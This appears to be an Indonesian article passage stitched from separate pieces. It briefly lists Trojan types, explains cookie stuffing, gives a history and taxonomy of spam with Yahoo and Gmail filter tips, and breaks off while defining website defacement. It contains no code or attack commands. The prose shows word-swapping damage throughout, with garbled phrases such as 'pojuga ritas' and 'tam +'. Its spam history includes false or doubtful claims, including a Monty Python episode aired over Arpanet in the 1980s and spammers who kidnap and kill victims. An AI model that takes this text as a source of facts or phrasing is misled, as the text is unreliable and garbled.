Pencatat penekanan tombol (keystroke logger/keylogger): Jenis Trojan ini akan memantau semua yang diketikkan oleh pemakai  dan akan mengirimkannya kepada penyerang. Jenis ini berbeda dengan spyware, meski dua hal itu  melakukan hal yang serupa (memata-matai pemakai ).
Tool administrasi jarak jauh (Remote Administration Tools/RAT): Jenis Trojan ini mengizinkan para penyerang untuk mengambil alih kendali  secara penuh  pada  sistem dan melakukan apapun yang mereka mau dari jarak jauh, seperti memformat hard disk, mencuri atau menghapus semua  data dan lain-lain. Contoh dari Trojan ini adalah Back Orifice, Back Orifice 2000, dan SubSeven.
DDoS Trojan atau Zombie Trojan: Jenis Trojan ini dipakai  untuk menjadikan sistem yang terinfeksi agar dapat melakukan serangan penolakan layanan secara terdistribusi  pada  host target.
Ada lagi sebuah jenis Trojan yang mengimbuhkan dirinya sendiri ke sebuah program untuk merekayasa  cara kerja program yang diimbuhinya. Jenis Trojan ini dinamakan  sebagai Trojan virus.
Cookies Stuffing, ini adalah script yang termasuk dalam metode blackhat, gunanya untuk membajak tracking code penjualan suatu produk, sehingga komisi penjualan diterima oleh pemasang cookies stuffing, bukan oleh orang yang terlebih dahulu mereferensikan penjualan produk itu  di internet.
Spam adalah pemakaian  perangkat elektronik untuk mengirimkan pesan secara bertubi-tubi tanpa dikehendaki oleh penerimanya. Orang yang melakukan spam dinamakan  spammer. Tindakan spam dikenal dengan nama spamming. Bentuk spam yang dikenal secara umum meliputi : spam surat elektronik, spam pesan instan, spam Usenet newsgroup, spam mesin pencari informasi web (web search engine spam), spam blog, spam wiki, spam iklan baris daring, spam jejaring sosial.
Beberapa contoh lain dari spam, yaitu pos-el berisi iklan, surat masa singkat (SMS) pada telepon genggam, berita dalam suatu forum kelompok warta berisi promosi barang yang tidak terkait dengan kegiatan kelompok warta itu , spamdexing yang menguasai suatu mesin pencari (search engine) untuk mencari pojuga ritas bagi suatu URL tertentu, berita yang tak berguna dan masuk dalam blog, buku tamu situs web, spam transmisi faks, iklan televisi dan spam jaringan berbagi.
Spam dikirimkan oleh pengiklan dengan biaya operasional yang sangat rendah, sebab  spam tidak memerlukan senarai (mailing list) untuk mencapai para pelanggan-pelanggan yang diinginkan. sebab  hambatan masuk yang rendah, maka banyak spammers yang muncul dan jumlah pesan yang tidak diminta menjadi sangat tinggi. Akibatnya, banyak pihak yang dirugikan. Selain pemakai  Internet itu sendiri, ISP (Penyelenggara Jasa Internet atau Internet Service Provider), dan masyarakat umum juga merasa tidak nyaman. Spam   mengganggu dan terkadang menipu penerimanya. Berita spam termasuk dalam kegiatan melanggar hukum dan yaitu  perbuatan pidana yang bisa ditindak melalui undang-undang Internet.
Sejarah Spam
Spam memiliki warna penting dalam dinamika pemakaian  internet. Kehadirannya menjadikan beberapa penyedia layanan surat elektronik atau e-mail memicu  filter untuk mengendalikan spam. Kebanyakan pemakai  e-mail memang menjadi tidak nyaman saat  akunnya dibanjiri e-mail spam dengan pesan-pesan komersial. Dari mana sebetulnya  spam bermula? Menurut penelusuran spamhelp.org, istilah ini terilhami adegan salah satu episode komedi situasi berjudul Monty Python. Komedi ini berasal dari Inggris, tapi diputar melalui jaringan komputer Arpanet (cikal bakal internet) pada awal tahun 1980-an.
Dalam satu episode serial itu  ada adegan yang menggambarkan sepasang suami istri yang makan di restoran. Mereka memesan banyak makanan. Dalam setiap makanan ada  daging cincang yang dipres. Dalam bahasa Inggris, makanan itu  dinamakan spam.
Pasangan ini pun merasa tidak puas dengan adanya spam pada setiap makanan yang dipesan dari restoran itu. Mereka lantas memesan makanan lain dengan memastikan kepada pelayan restoran untuk tidak diberi spam. Saat itu juga  dari balik dapur restoran terdengar teriakan yang dilagukan, Spamspamspamspam yang menyenangkan. Spam yang menakjubkan.
Dari sinilah kemudian kemudian kata spam punya makna baru. Kata ini dilekatkan dengan sesuatu yang tidak diinginkan. E-mail yang tiba-tiba terkirim tanpa dikehendaki pemilik akun pun kemudian dinamakan  sebagai spam. Padahal kata yang pas untuk mewakili e-mail tak diinginkan itu adalah Unsolicited Bulk Email atau Unsolicited Commercial Email alias e-mail yang tidak diinginkan.
Menurut ezinearticles.com, e-mail spam pertama kali dikirimkan oleh perusahaan peralatan digital. Namun orang yang secara jelas teridentifikasi sebagai pengirim spam di dunia ini adalah Dave Rhodes. Mahasiswa sebuah perguruan tinggi ini pertama kali mengirim spam pada tahun 1986. Waktu itu, dia manfaatkan jaringan komputer Usenet (yang kemudian berkembang jadi internet) untuk mengiklankan perusahaan Pyramid Scheme.
Tahun 1993, seorang bernama Richard Depew menulis tentang program yang bisa menghentikan posting dari newsgroup. Sayang program ini mengandung kelemahan dan saat dijalankan ternyata berhasil dibobol dengan terkirimnya 200 email ke News Admin Policy Newsgroup. E-mail pembobol inilah yang kemudian secara resmi dinamakan  spam.
Pembobolan ini kemudian menghilhami dua orang bernama Cantor dan Siegel. Keduanya memanfaatkan internet di tahun 1994 untuk mengirimkan email yang tidak disukai para pemilik akun e-mail. Keduanya mengirim e-mail komersial kepada 6.000 akun dalam waktu bersamaan. Kiriman e-mail spam pun terus berkembang. Di tahun 2000-an ini, diperkirakan sekitar 90 juta e-mail spam terkirim setiap hari. Pendiri Mcrosoft Bill Gates mengungkapkan dirinya menerima empat juta e-mail setiap tahun, dan kebanyakan adalah e-mail spam.
Spam surat elektronik, yang dikenal sebagai surat elektronik massal yang tidak diminta (unsocialicited bulk email atau UBE), junk mail, atau surat elektronik komersial yang tidak diminta (unsocialited commercial email atau UCE), adalah praktik pengiriman pesan dalam surat elektronik yang tidak diinginkan,   bersifat komersial, dan masuk dalam jumlah besar kepada siapa pun. Spam di surat elektronik mulai menjadi masalah saat  internet dibuka untuk umum pada pertengahan 1990-an. Pertumbuhan yang pesat dari tahun ke tahun hingga saat ini sudah  menghasilkan spam 80%  85% dari seluruh surat elektronik di dunia. Tekanan untuk memicu  spam surat elektronik sudah  berhasil di beberapa negara hukum. Spammers mengambil keuntungan dari fakta ini dengan   mengirimkan spam ke negara lain sehingga tidak akan memicu  mereka bermasalah secara hukum.
Dalam perkembangannya, spam surat elektronik saat ini dikirim melalui "jaringan zombie", jaringan virus yang terinfeksi di komputer pribadi baik rumah atau di kantor di seluruh dunia. ini  mempersulit usaha  untuk mengendalikan  penyebaran spam, seperti banyak kasus di mana spam tidak berasal dari spammers. Munculnya banyak spam yang bukan dari spammers disebab kan pembuat perangkat perusak, spammers, dan penipu keuangan belajar satu sama lain sehingga memungkinkan mereka membentuk berbagai jenis kerja sama.Pesan instan
Spam pesan instan memanfaatkan sistem dari pesan instan. Meskipun memiliki banyak kekurangan dibandingkan surat elektronik, menurut laporan dari Ferris Research, 500 juta spam pesan instan yang dikirim pada tahun 2003, jumlahnya naik dua kali lipat dibanding tahun 2002. Spam pesan instan   tidak diblokir oleh firewall sehingga saluran ini sangat berguna bagi para spammers.
Usenet Newsgroup dan forum
Spam newsgroup adalah jenis spam yang sasarannya adalah usenet newsgroup. Jenis spam ini sebetulnya  yaitu  spam sebelum spam surat elektronik. Spam ini   masuk secara berulang dengan subtansi pesan yang sama.
Spam forum adalah menciptakan pesan berupa iklan atau pesan yang tidak diinginkan di forum internet. biasanya , spam ini dilakukan oleh robot spam otomatis. Kebanyakan spam di forum terdiri dari link ke situs eksternal, dengan tujuan selain untuk meningkatkan visibilitas mesin pencari di area  sangat kompetitif seperti penurunan berat badan, obat-obatan, perjudian, pornografi atau pinjaman, juga untuk menghasilkan lebih banyak lalu lintas dalam situs web komersial itu.
Telepon genggam
Spam telepon genggam diarahkan pada layanan pesan teks di ponsel. Spam ini bisa sangat mengganggu pelanggan sebab  bukan hanya masalah ketidaknyamanan, tetapi juga sebab  biaya yang mungkin dikenakan dari setiap pesan teks yang diterima. Istilah "kejang" diciptakan di website iklan Adland pada tahun 2000 untuk menggambarkan pesan teks spam.
Permainan Daring
Banyak permainan daring yang memungkinkan pemain untuk menghubungi satu sama lain melalui pesan, ruang diskusi, atau area diskusi publik. Syarat yang harus dipenuhi sebagai spam bervariasi dari setiap permainan, tetapi biasanya istilah ini berlaku untuk semua bentuk pesan massal dan melanggar syarat-syarat kontrak jasa untuk situs web. ini  sangat umum ditemui adalah perdagangan uang secara nyata. Spammers untuk jenis ini mencoba untuk menjual permainan yang berhubungan dengan barang dan uang dalam dunia nyata. Mereka mengirim spam melalui sistem pesan dalam permainan atau bisa juga mematikan permainan kemudian membawa pemain ke situs web penjualan. Spam dapat mengganggu permainan sehingga spam tidak disarankan oleh pengembang permainan daring.
Mesin pencari informasi web (web search engine spam)
Spam ini dinamakan  juga spamdexing, singkatan dari spamming dan indexing. Spamdexing ini mengacu pada praktek di WWW dari rekayasa  halaman HTML untuk meningkatkan kesempatan mereka dalam menempatkan spam di mesin pencari dengan relevansi paling tinggi. Banyak mesin pencari modern merekayasa  pencarian algoritma mereka untuk mencoba mengecualikan halaman web memakai  taktik spamdexing. contohnya , mesin pencari akan mendeteksi kata kunci yang berulang sebagai spam dengan memakai  analisis tata bahasa. Jika pemiliki web ditemukan memiliki spam untuk meningkatkan halaman palsu itu , situs web dapat dikenakan sanksi oleh mesin pencari.
Blog, wiki, dan buku tamu
Spam blog atau blam secara singkat adalah spam pada weblog. Pada tahun 2003, jenis spam ini mengambil keuntungan dari komentar terbuka dalam blog perangkat lunak Movable Type dengan berulang kali menempatkan komentar untuk berbagai posting blog. Serangan serupa   dilakukan  pada  wiki dan buku tamu, keduanya menerima kontribusi pemakai .
Bentuk non-komersial
Surat elektronik dan bentuk lain dari spam sudah  juga dipakai  untuk tujuan selain iklan. pemakaian  awal spam berkaitan dengan agama dan politik. Serdar Argic, contohnya , memakai  spam usenet untuk revisionis sejarah. Beberapa penginjil sudah  memakai  spam usenet dan surat elektronik untuk menyebarkan khotbah. Dengan berkembangnya spam, semakin banyak penjahat yang memakai  spam untuk berbagai macam penipuan. Dalam beberapa kasus spammers memakai nya untuk menarik orang menuju suatu tempat, melakukan penculikan dan meminta tebusan,   korban dibunuh jika tidak segera memberi tebusan.
Tips pencegahan Spam bagi pemakai  email Yahoo (yahoo! Mail)
Sebenernya sangat mudah mencegah beberapa tamu tak di undang untuk yahoo mail, sebab  yahoo mail sudah  dibekali dengan pengusir spam, yaitu spamGuard. Dan berikut adalah cara memakainya.
Login ke akun yahoo! anda seperti biasa, saat  melihat email yang tidak anda inginkan klik tombol spam untuk mengaktifkan spamGuard.
Sesudah  itu secara otomatis SpamGuard akan memblokir pesan apa pun yang datang dari alamat itu .
Tips pencegahan Spam bagi pemakai  email Google (Gmail)
Pakai Filter dengan cara klik setting> filters, lalu pilih Creat a Filter berikutnya tinggal atur saja apa yang ingin anda filter atau saring.
Beri tanda tambah caranya tam  + di belakang nama akun Anda dan tam  kata-kata unik yang mengenali alamat email itu. Ini agar anda bisa memicu  filter dengan mudah.
Laporkan Sebagai Spam. suatu saat Gmail mungkin tidak mampu memblokir semua spam yang masuk ke inbox anda melalui filternya. Namun anda bisa mengajarinya untuk mengenali spam. kliklah tombol Marks as spam pada sebuah e-mail dari seseorang yang tidak anda sukai. Gmail akan memakai  informasi itu  untuk menolak kedatangan pesan serupa dimasa datang.
Deface  berarti merusakkan; mencemarkan; menggoresi; menghapus semua kan tetapi arti kata deface disini yang sangat lekat adalah sebagai salah satu kegiatan merubah tampilan suatu website baik halaman utama  atau index filenya ataupun halaman lain yang masih terkait dalam satu  url dengan website itu  (bisa di folder atau di file).
Deface adalah teknik mengganti atau menyisipkan file pada server, teknik ini dapat dilakukan sebab  ada  lubang pada sistem keamanan  yang ada di dalam sebuah aplikasi. ini  bertujuan untuk melakukan perubahan tampilan pada website korban dengan tampilan yang dimiliki oleh si defacer. Deface yaitu  sebuah serangan yang dilakukan untuk mengganti visual dari sebuah website. Para hacker biasanya meninggalkan pesan dan nickname mereka agar hasil kerjanya diketahui oleh khalayak hacker.
Defacing atau kegiatan mengubah halaman website orang lain tanpa sepengetahuan orang itu , pastinya ini adalah kejahatan dunia cyber. Deface terkenal juga dengan sebutan cybergrafitti yaitu corat-coret website tertentu. Deface dilakukan dengan memanfaatkan kelemahan dari website itu